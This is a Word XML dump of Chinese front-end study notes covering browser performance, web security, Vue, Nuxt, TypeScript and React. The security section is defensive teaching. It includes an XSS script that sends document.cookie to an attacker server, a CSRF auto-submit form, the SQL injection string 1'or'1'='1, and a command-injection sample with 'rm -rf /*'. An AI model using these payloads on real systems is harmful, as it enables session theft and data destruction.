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浏览器方面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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重排重绘：在浏览器中改变几何属性就会触发重新构建渲染树（先触发重排：负责几何属性的更新，在触发重绘：负责样式更新）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几何属性的更新：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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添加删除元素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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元素位置改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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元素尺寸改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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元素内容改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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页面渲染器初始化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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浏览器窗口大小发生改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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优化：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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多次css修改合并为 一次修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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改用class类更新样式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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隐藏元素，修改后，再显示元素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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将元素保存在fragment中再插入替换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安全问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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xss ：如果网页可以运行外部输入的脚本，黑客会运行一个自己的脚本例如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&lt;scritp src=’....index.js’&gt;&lt;/script&gt; (http://locahost:8080?from=&lt;scritp src=’....index.js’&gt;&lt;/script&gt; 可以把这个连接搞成短链形式欺骗用户)  index.js 里面：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var image = new Image(); image.src=’http://loadhost:4000/img?c=’+document.cookie,发送一个请求到黑客服务器，可以用nodejs和中间件取得cookie，然后黑客就去目标网站直接在浏览器里面输入document.cookie=cookir  就可以完全模拟用户登录了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还有一个可能是在评论里面注入例如：发表一个评论：我来了&lt;scritp src=’....index.js’&gt;&lt;/script&gt;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所有登录这个网站看到这个评论的人的cookie信息会被窃取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防范措施：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1.一般来说这种攻击框架层面上就已经有防范了。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2.ctx.set(“X-XSS-Protection”,0),浏览器自动拦截3. ctx.set('Content-Security-Policy', "default-src 'self'") 只加载本站的脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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通过写函数转换&lt; &gt; &amp; 等符号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numP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通过xss库转换 var xss = require(‘xss’);  var html = xss(“&lt;h1&gt;&lt;/h1&gt;&lt;script&gt;*****&lt;/script&gt;”)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设置httpOnly:true,表示不能通过控制台修改cookie   app.use(session({httpOnly:true}, app));  另外一种设置方式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Response.addHeader(“set-cookie”,”uid-112;path=/ HttpOnly”)</w:t>
      </w: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 w:firstLine="210" w:firstLineChars="10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csrf  跨站伪造请求，意思是在a网站没有退出的情况下，b网站利用&lt;form name="form" action="http://localhost:3000/updateText" method="post" target=“csrf”&gt; 添加评论: &lt;input type="text" name="text" value="CSRF评论。。" /&gt; &lt;/form&gt;   然后提交 document.querySelector('form').submit();  这里action请求就会带上cookie请求成功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防范：1可以用 头信息里的 referer（请求来源），但是这个方案不太爱完美2.验证码方式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点击劫持，黑客通过在自己的网站上加上目标网站的iframe连接，经过精确定位控制目标网站的按钮在诱导按钮上面。隐藏iframe，点击诱导按钮就点击了目标网站的功能了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防范：中间键中加载 ctx.set('X-FRAME-OPTIONS', 'DENY')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app.use(async (ctx, next)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await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ctx.set('X-FRAME-OPTIONS', 'DENY')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sql注入：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填⼊特殊密码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1'or'1'='1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拼接后的SQL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SELECT *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FROM test.user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WHERE username = 'laowang'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AND password = '1'or'1'='1'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这样就可以不用密码也登录了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防范：一般调用封装好的方法：query(‘SELECT * FROM WHERE ID=?’,PASSWORD)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OS 攻击 一般执行shell 命令的时候有可能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例如执行下面这个exe(‘ git clone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"http://***"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http://***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&amp;&amp; rm -rf  &amp;&amp; /’)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6.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DNS劫持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顾名思义，DNS服务器(DNS解析各个步骤)被篡改，修改了域名解析的结果，使得访问到的不是预期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防范：升级https、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>7.DDOS 攻击 分布式拒绝访问攻击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DDOS 不是⼀种攻击，⽽是⼀⼤类攻击的总称。它有⼏⼗种类型，新的攻击⽅法还在不断发明出来。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⽹站运⾏的各个环节，都可以是攻击⽬标。只要把⼀个环节攻破，使得整个流程跑不起来，就达到了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瘫痪服务的⽬的。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其中，⽐较常⻅的⼀种攻击是 cc 攻击。它就是简单粗暴地送来⼤量正常的请求，超出服务器的最⼤承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受量，导致宕机。我遭遇的就是 cc 攻击，最多的时候全世界⼤概20多个 IP 地址轮流发出请求，每个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地址的请求量在每秒200次~300次。我看访问⽇志的时候，就觉得那些请求像洪⽔⼀样涌来，⼀眨眼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就是⼀⼤堆，⼏分钟的时间，⽇志⽂件的体积就⼤了100MB。说实话，这只能算⼩攻击，但是我的个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⼈⽹站没有任何防护，服务器还是跟其他⼈共享的，这种流量⼀来⽴刻就下线了。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防御⼿段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// 以 Node.js 为例，假如在接⼝中需要从 github 下载⽤户指定的 repo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const exec = require('mz/child_process').exec;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let params = {/* ⽤户输⼊的参数 */};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exec(`git clone ${params.repo} /some/path`);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https://github.com/xx/xx.git &amp;&amp; rm -rf /* &amp;&amp;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备份⽹站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备份⽹站不⼀定是全功能的，如果能做到全静态浏览，就能满⾜需求。最低限度应该可以显示公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告，告诉⽤户，⽹站出了问题，正在全⼒抢修。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HTTP 请求的拦截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硬件 服务器 防⽕墙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  <w:t xml:space="preserve">- 带宽扩容 + CDN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>以上的配置项目可以用一个插件配置：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 xml:space="preserve"> const helmet = require('koa-helmet')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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> app.use(helmet())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ajorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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8.md5sh1加密写法：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crypto = require('crypto')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hash = (type, str) =&gt; crypto.createHash(type).update(str).digest('hex')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md5 = str =&gt; hash('md5',str)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sha1 = str =&gt; hash('sha1',str)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encryptPassword = (salt, password) =&gt; md5(salt + 'abced@#4@%#$7' + password)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psw = '11111'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console.log('md5', md5(psw))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console.log('sha1', sha1(psw))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module.exports = encryptPassword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注意加盐salt 和中间字段 提高安全性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人机验证：验证码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express = require('express');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createCanvas, loadImage } = require('canvas');//用canvas画图，最后最后返回两张图片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path = require('path');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express();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app.use(express.static(__dirname + '/'))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Canvas()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console.log(...arguments)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createCanvas(...arguments)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背景图片的宽可以传参设置，默认值是320 * 180，小拼图默认是60 * 45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app.get('/drag_captcha', async (req, res)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{ bgWidth: width } = req.query;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bgWidth = parseInt(width) || 320;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bgHeight = (width &amp;&amp; parseInt(width * 180 / 320)) || 180;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dragPicWidth = 60;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dragPicHeight = 45;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index = Math.floor(Math.random() * 13);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positionX = Math.floor(Math.random() * (bgWidth - dragPicWidth - 10) + 11);  // 空白拼图的定位X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positionY = Math.floor(Math.random() * (bgHeight - dragPicHeight - 10) + 11);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bgCanvas = new Canvas(bgWidth, bgHeight);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dragCanvas = new Canvas(dragPicWidth, dragPicHeight);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background = bgCanvas.getContext('2d');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dragPic = dragCanvas.getContext('2d');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image = await loadImage('bg.jpg')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background.drawImage(image, 0, 0, 320, 180, 0, 0, bgWidth, bgHeight);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dragPic.drawImage(bgCanvas, positionX, positionY, dragPicWidth, dragPicHeight, 0, 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dragPicWidth, dragPicHeight);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background.clearRect(positionX, positionY, dragPicWidth, dragPicHeight);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//挖图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(req.session)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//位置保全在session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req.session.dragCaptcha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positionX,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positionY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res.send({ bgCanvas: bgCanvas.toDataURL(), dragCanvas: dragCanvas.toDataURL()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http是用明文传输的所以不太安全，现在全球都在向https转译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https有三个优点1.保密2.完整3.真实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https= http+ssl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ssl:对称秘钥和不对称秘钥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对称加密是加密解密两个秘钥都是一样的，缺点是很容易被破解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不对称加密在加密过程中产生一对秘钥，公钥和私钥，公钥负责加密，私钥负责解密，缺点是加密过程非常消耗资源，不能作为大数据传输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Ssh验证过程git的登录过程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865" cy="3107055"/>
            <wp:effectExtent l="0" t="0" r="698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申请证书:在阿里云直接申请证书 申请，放到nginx中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770" cy="2546350"/>
            <wp:effectExtent l="0" t="0" r="508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一般情况下把公钥放到服务器的.ssh 目录下面的authorized_keys文件夹中。如果是阿里云的服务器可以在创建的过程中上传公钥，会自动放到系统中的authorized_keys中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https验证过程：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5420" cy="3186430"/>
            <wp:effectExtent l="0" t="0" r="1143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082925"/>
            <wp:effectExtent l="0" t="0" r="381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无头浏览器技术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Pupperter 可以用于爬虫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设计模式：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性能问题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js统计页面加载时间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window.onload = function ()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   var loadTime = window.performance.timing.domContentLoadedEventEnd-window.performance.timing.navigationStart; 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    console.log('Page load time is '+ loadTime);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五：vue课程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9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官方组件应用名字规范是，首字母大写，后面每个单词首字母大写，用的时候首字母小写，单词小写，单词间连接用-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例如：import HelloWorld from “./componnets/helloword.js”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应用&lt;hello-word&gt;&lt;/hello-word&gt;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2.属性展开符号：复制一个对象的{...item}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3.input type=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checkbox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v-model=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active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绑定是否选中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4.props里面是对象或者是数组的话，组件里面改是没有问题的，但是不太建议这样做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一般情况下是通过父亲组件来删除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vue里面删除数组里面的某一项arr.splice(index,1)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组件化，一切皆组件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Elementui：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可以用vue add element 在已经有的项目上面添加ui库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="21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element按需加载：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Vue from ‘vue’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Import {Button}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element-ui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Vue.use(Button)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组件化：编写自己的组件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v-model的实现方式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&lt;input :type="type" :value="value" @input="onInput"&gt;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props:{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value:{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type:String,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default:''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type:{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type:String,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default:'text'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methods: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onInput(e)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let value = e.target.value;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this.$emit('input',value);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this.$parent.$emit('validate')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&lt;/script&gt;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&lt;k-input :value=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@input=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value=arguments[0]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&gt;&lt;/k-input&gt;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相当于v-model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vue中的跨组件传输数据通常用provide 和 inject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在父组件的data同级下写：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provide(){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val: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 is a val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子组件在data同级中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inject:[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val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子组件发送事件可以用this.$parent.$emit(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在父组件中通过this.$on(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)接收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 路由：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router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Src/router.js 下面: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router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vue-router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Vue.use(router)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home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./views/home.vue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挂载：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router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./router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&lt;router-view&gt;&lt;/router-view&gt; 是一个非常重要的组件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匹配路由的组件会放到这个占位符上面渲染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history模式对于seo比较有利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&gt;&lt;/router-link&gt; router-link相当于a用于跳转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To关键属性一定要有。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另个的用法:&lt;router-link :to=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pageA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&gt;&lt;/router-link&gt;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动态路由传参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获取参数：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"http://localhost/b/123?Name=zhanghsng" </w:instrTex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http://localhost/b/123?Name=zhanghsng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Props:[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],//路由上配置了  Props:true,，就可以仔组件中props中得到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Created(){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Console.log(this.$router.params.id)//123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Console.log(this.$router.query.name)//zhangshang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嵌套路由：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history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Children:[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Component:test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这个情况需要在home中加上&lt;router-view&gt;&lt;/router-view&gt;成为二级路由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两个&lt;router-view&gt;的情况下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&lt;router-view&gt;&lt;/router-view&gt;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&lt;router-view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&gt;&lt;/router-view&gt;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Compontents:{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Default:home,//渲染在第一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A:list//渲染第二个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全局守卫,Router=new Router({})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//注意要执行next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Router.beforeEach((to,from,next)=&gt;{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//判断如果没有登录可以在这个地方跳转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//next(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//注意要执行next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Router.beforeResolve((to,from,next)=&gt;{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//就是执行时间比routerEach慢一点其他的一样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//这个可以不用next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Router.afterEach((to,from,next)=&gt;{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Next()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路由里部守卫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Props:true,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beforeEnter(to,from,next){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//在beforeEach之后，beforeResolve之前执行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Next()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Component:Home,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Children:[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test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Component:test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组件内部守卫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beforeRouteEnter(to,from,next){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beforeRouteUpdate(to,from,next){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beforeRouteLeave(to,from,next){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一次路由过程的具体的执行顺序是beforeEach beforeEnter beforeRouteEnter beforeResolve  afterEach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异步组件按需加载(首页除外)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Router({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/b/:id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Component:()=&gt;import(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./views/page.vue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Store.js里面：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vuex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Vue.use(vuex)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State:{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Count:1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Mutations:{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Add(state){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State.count++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Actions:{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Add({commit}){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//触发 this.$store.commit(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)//触发Mutations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//触发 this.$store.dispath(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)//触发Mutations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//导入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Store,//赋值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{mapActions}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Methods:{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...mapActions([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vuex多文件Modules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cfrom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./module1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module2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./module2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Modules:{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Module1:module1,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Module2:module2,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//注意module1和module2要加上字段namespaced：true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vue双向绑定对数组的拦截：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obarr =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arrayProto = Array.prototype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arrayMethods = Object.create(arrayProto)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Object.defineProperty(arrayMethods,'push',{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value:function mutator(){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//缓存原生方法，之后调用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original = arrayProto['push']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let args = Array.from(arguments)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original.apply(this,args)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console.log(obarr)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obarr.__proto__ = arrayMethods;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Diff算法要点：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多个setState合并成一个state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同层级比较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同层级用key标记，加快查找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选择一个合适的ui库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有一下几个要点：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维护团队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迭代更新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Github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测试覆盖率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优点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缺点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搭建vue项目0到1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vue-cli3 创建项目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router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add vuex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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 ui库引用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5.如果路由需要做登录的验证：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可以在router里面添加标记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/about.vue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Meta:{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Auth:true//表示需要验证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2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在router.js里面写全局路由守卫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Router.beforeEach((to,from,next)=&gt;{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If(to.meta.auth){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token = localStorage.getItem(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token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)//令牌存在本地肯定不安全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//但是前端本来就没有绝对安全的策略，只能通过后端减少token的生效时间来预防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If(token){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Next()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Next({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Path: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/login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Query:{ redirect:to.path }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1050" w:firstLineChars="5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Next()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跳到login.vue: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//登录提交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this.$store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.dispatch("login", this.model)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.then(code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if (code)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登录成功重定向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到登录前页面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path = this.$route.query.redirect || "/";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this.$router.push(path);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.catch(error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有错误发生或者登录失败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const toast = this.$createToast({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time: 2000,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txt: error.message || error.response.data.message || "登录失败",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type: "error"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toast.show();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//调用store方法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Vue from "vue";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Vuex from "vuex";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us from "./service/user";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Vue.use(Vuex);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new Vuex.Store({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isLogin: localStorage.getItem('token') ? true : false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mutations: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setLoginState(state, b)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state.isLogin = b;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actions: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login({ commit }, user)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// 登录请求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us.login(user).then(res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{ code, token } = res.data;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(code)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登录成功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变更状态记录token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commit("setLoginState", true);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localStorage.setItem("token", token);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code;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//给每个请求加上token，用于后端判断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r.js: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用于拦截请求和响应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axios = require('axios')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function(vm){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设置请求拦截器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axios.interceptors.request.use(config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获取token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const token = localStorage.getItem('token')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(token) { // 如果存在令牌这添加token请求头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config.headers.Authorization = 'Bearer ' + token;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config;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响应拦截器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参数1表示成功响应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这里只关心失败响应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axios.interceptors.response.use(null, err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(err.response.status === 401) { // 没有登录或者令牌过期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清空vuex和localstorage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vm.$store.dispatch("logout");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// 跳转login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vm.$router.push("/login");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Promise.reject(err);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interceptor from './interceptor'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new Vue({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router,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store,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render: h =&gt; h(App)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}).$mount('#app')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执行拦截器初始化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interceptor(app);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bearer token 规范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在header头中加入Authorization:Bearer &lt;token&gt;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//登录成功放回令牌：jwt.sign，请求接口检验token ：jwtAuth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后端代码：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Koa = require("koa");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Router = require("koa-router");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生成令牌、验证令牌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jwt = require("jsonwebtoken");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jwtAuth = require("koa-jwt");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生成数字签名的秘钥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secret = "it's a secret";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app = new Koa();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router = new Router();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router.get("/api/login", async ctx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{ username, passwd } = ctx.query;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console.log(username, passwd);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(username == "kaikeba" &amp;&amp; passwd == "123")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生成令牌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token = jwt.sign(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data: { name: "kaikeba" }, // 用户信息数据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exp: Math.floor(Date.now() / 1000) + 60 * 60 // 过期时间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secret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1, token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 else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ctx.status = 401;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0, message: "用户名或者密码错误"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router.get(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"/api/userinfo",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jwtAuth({ secret }),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async ctx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ctx.body = { code: 1, data: { name: "jerry", age: 20 } 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app.use(router.routes());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app.listen(3000);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首页做切换的时候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一般的做法是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&lt;transition name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route-move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&lt;router-view class=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child-view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&lt;/transition&gt;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&lt;tab-bar&gt;&lt;/tab-bar&gt;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Tab-bar 改变设置路由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搭建完成基本框架之后就就可以写模块了以goods模块为例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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新建一个service文件夹，新建一个goods.js文件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axios from 'axios'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getGoodsInfo(){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axios.get('/api/goods')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.then(res=&gt;{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const {code, data: goodsInfo, slider, keys} = res.data;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数据处理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if (code)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{goodsInfo, slider, keys}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 else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return null;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})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store文件夹下面新建一个goods.js文件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gs from "@/service/goods";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slider: [],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keys: [],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goodsInfo: {}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mutations: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setGoodsInfo(state, { slider, keys, goodsInfo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state.slider = slider;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state.keys = keys;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state.goodsInfo = goodsInfo;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getters: { // 添加一个goods属性，转换对象形式为数组形式便于循环渲染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goods: state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state.keys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.map(key =&gt; state.goodsInfo[key])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.reduce((prev, next) =&gt; prev.concat(next), []);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actions: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getGoods({ state, commit })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(!state.keys.length)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// 没有数据采去获取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gs.getGoodsInfo().then(goodsInfo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commit('setGoodsInfo', goodsInfo)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在调用页面：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mapState, mapActions, mapGetters } from "vuex";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Creaded(){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This.getGoods();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//前面的goods是命名空间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Computed:{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...mapState(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,{slider:state=&gt;{state.goods.slider}}),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...mapGetters(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Methods：{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...mapAction(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good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getGoods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就可以用store数据了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vue动画</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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用&lt;transition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route-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forward”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&lt;router-view   class=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child-view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&gt;&lt;/router-view&gt;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&lt;/transition&gt;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包含需要动画的模块</w:t>
      </w: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class定义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//进场前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.route-forward-enter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transform: translate3d(-100%, 0, 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/* 出场后 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.route-forward-leave-to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transform: translate3d(100%, 0, 0);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//中间激活状态 动画函数的执行方式在这个地方执行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.route-forward-enter-active,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.route-forward-leave-active,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transition: transform 0.3s;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.child-view { // 添加到每个页面上的样式，确保页面间不挤占位置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position: absolute;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left: 0;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top: 0;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width: 100%;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padding-bottom: 40px;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让浏览器重绘的方法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Document.body.offsetHeight;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vue多实例组件创建方式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Vue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function(component,props){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instance = new Vue({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Render:h=&gt;{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//这个是虚拟dom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h(component,{props})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}).$mount();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//生成dom 追加到body中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Document.body.appendChild(instance.$el)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comp = instance.$children[0];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Comp.remove = function(){//销毁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="1050" w:firstLineChars="5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document.body.removeChild(instance.$el)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instance.$destroy();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comp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//调用：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CartAnim from "@/components/CartAnim.vue";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anim = this.$create(CartAnim,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pos: { left: "45%", bottom: "16px"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anim.start(el);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anim.$on("transitionend", anim.remove);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//监听组件事件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Nuxt框架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npx create-nuxt-app abc 表示先安装脚手架子，并且每次运行先安装新版本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然后在创建项目abc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项目中的assets文件夹是需要打包处理的图片，例如base64图片的处理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Static文件夹是放置不用处理的图片的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Nuxt目录下面的page下，新建一个文件就等于新建一个路由了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例如新建user.vue 就可以在浏览器里面输入http://localhost:3000/user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导航用&lt;nuxt-link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/users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&gt;&lt;/nuxt-link&gt;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文件夹users下面的index.vue，是user的路由，其他文字的vue文件就是user/**lu路由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判断是否是服务端渲染的api：process.server //为true是服务器，false为前端渲染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动态路由_id.vue就会生成user/:id这样的路由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嵌套路由，如果有文件夹同名的vue文件，就会发生嵌套例如：user文件夹下面有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user.vue，那么user文件夹下面的文件都会成为子路由，user.vue中要放置&lt;nuxt-child&gt;&lt;/nuxt-child&gt;  就可以显示嵌套的子路由了，也可以该相关的布局页面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在layout下面新建user.vue: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&lt;template&gt;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&lt;h1&gt;这是一个标题&lt;/h1&gt;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&lt;nuxt /&gt;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&lt;/template&gt;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然后在page/user.vue 指定布局页面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Layout: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Head：{//可以配置加载css和js文件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Title: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标题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//改变标题，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Async asyncData(){  //nuxt框架下取异步数据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Console.log(process.server)//这个可以判断是否是在服务器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users  = await getUser()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{users} //最终会和data的数据合并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前端跨域问题的配置：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在nuxt.config.js里面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Modules:[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@nuxtjs/axios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Axios:{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Proxy:true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Proxy:{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/api/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http://localhost:3000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异步取数据：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Async asyncData({params，$axios}){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data=await $axios.$get(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/api/users/${params.id}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If(data.ok){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{user:data.user}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路由拦截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nuxt.config.js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plugins: ["@/plugins/element-ui", "@/plugins/router"],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在plugins下加入route.js文件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({app}) =&gt;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app.router.beforeEach((to,from,next)=&gt;{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console.log('我要去：'+to.path);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next();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vuex：nuxt框架有store文件夹就自动启动vuex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在根目录下面加上index.js 代表没有命名空间的数据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state = ()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 0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mutations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increment(state)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state.counter++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在根目录下面加上user.js 代表user命名空间下面的数据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state = () =&gt; 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list: []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mutations =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set(state, list)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state.list = list;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add(state, name)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state.list.push({ name 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触发：this.$store.commit(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user/set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typeScript特点：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类型检查和类型注释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接口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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声明文件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创建一个支持ts的vue项目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 create vue-ts 选择项目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自定义选项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添加ts支持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基于类组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Eslint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语法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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title:string //类型注解，表示字符串类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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=‘xx’ //这里不会报错，有类型推断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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names:string[] //字符串的数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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：Array&lt;string&gt; //字符串的数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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name :(string | number)[]//字符串和数字数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Let list :any[] //任意类型数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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greeting(person:string):string{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}//参数和返回值的类型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warn():viod{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}//没有返回值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//内置类型 ：string,number,boolean,viod,any,object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vue中ts 的class用法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Component, Prop, Vue, Emit,Watch } from "vue-property-decorator";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Readonly foo:string=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foo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//只读属性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@Prop() private msg!:string=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//数字类型，必填，默认值name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@Prop() private  obj:{foo:string} //带有foo属性的对象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features=[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name2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]//相当于data里面的数据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AddFeature(event:any){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This.features.push(event.target.value)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event.target.value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””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Created(){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//变量前面的修饰符有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private 类里面可以用，外部访问可以用get set 封装访问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protected 子类也可以用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Public 不写默认public 都可以访问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Animal{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Constructor(private name:string){//相当于定义name属性并且将构造参数赋值给他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//自定义类约束：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class Feature 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id: number, public name: string, public version: string) {}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private features: Feature[] = [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,id:1,version:1}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接口约束结构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interface Person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firstName: string;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lastName: string;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sayHello(): string; // 要求实现方法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greeting2(person: Person)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"Hello, " + person.firstName + " " + person.lastName;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//必须有sayHello方法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 = { firstName: "Jane", lastName: "User", sayHello: () =&gt; "lalala" };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console.log(greeting2(user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//类实现接口方法：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Greeter implements Person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firstName = "", public lastName = "") {}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sayHello()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"Hello, " + this.firstName + " " + this.lastName;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user2 = new Greeter("a", "b");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//计算属性的写法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Get featureCount(){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this.features.length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//派发事件：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@Emit()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private addFeature(event: any)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若没有返回值形参将作为事件参数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feature = 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name: event.target.value,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id: this.features.length + 1,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version: "1.0"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this.features.push(feature);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event.target.value = "";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feature; // 返回值作为事件参数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是类里面的方法，可以被click调用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也表示派发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addFeature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事件，事件参数是返回值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函数参数：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sayhello(name:string,age?:number):string|number{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name+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+age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sayHello(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,20)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sayHello(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//参数没有问号就是必传的</w:t>
      </w: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函数重载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info(a:{name:string}):string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info(a:string):object;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info(a:any):any{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If(typeof a===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object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a.name;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{name:a}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Info({name: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Info(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//两种类型的调用都可以，叫重载，先定义两种接口，在实现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泛型具体类：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Feature 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constructor(public id: number, public name: string, public version: string) {}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interface Result&lt;T&gt;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ok: 0 | 1;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data: T[];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泛型函数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getData&lt;T&gt;(): Promise&lt;Result&lt;T&gt;&gt;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data: any[] = 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id: 1, name: "类型注解", version: "2.0"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{ id: 2, name: "编译型语言", version: "1.0"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Promise.resolve({ ok: 1, data } as Result&lt;T&gt;);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result = await getData&lt;Feature&gt;();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this.features = result.data;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9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装饰器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@Component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//如果不加括号就表示下面的是参数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//执行玩装饰器后又返回装饰器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//可以在括号里面直接添加参数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@Component({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props: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属性也可以在这里配置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sname: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type: String,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default: "匿名"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Hello extends Vue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Reat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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什么是jsx？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Jsx是javascript xml表现，用js描述html，每个节点代表一个函数调用，jsx经过webpack babel打包之后就成为虚拟dom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react打包后的代码是react.createElement(dom，app)，所以需要引入react，即使没有用到过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SetState发生了什么？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This.$updater.addClassBack(callback);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This.$updater.addState(nextState)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diff算法策略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同层比较，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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先比较类型，类型不一样就直接删除，换上新的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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比较属性有没有不同</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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再往下递归比较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通过key加快同层查找比较，如果没有key的话只能删除插入了，操作会大大增加</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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多个setState合并成一个更新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5.基本组件写法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.{Component}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./app.css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logo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./logo.svg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App extends Component{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Function formatname(user){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‘’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Const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jerry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Const jsx = &lt;p&gt;hello&lt;/p&gt;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{/*注释写法*/}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&lt;h1&gt;{name}&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;h1&gt;{ this.formatname() }&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;img src={logo} style={{width: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100px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}} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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{jsx}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{}里面四个表达式就行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 有两种类型的组件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function welcome1(props){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&lt;div&gt;webcome1,{props.name}&lt;/div&gt;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class webcome2 extend React.Component{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numId w:val="0"/>
        </w:numPr>
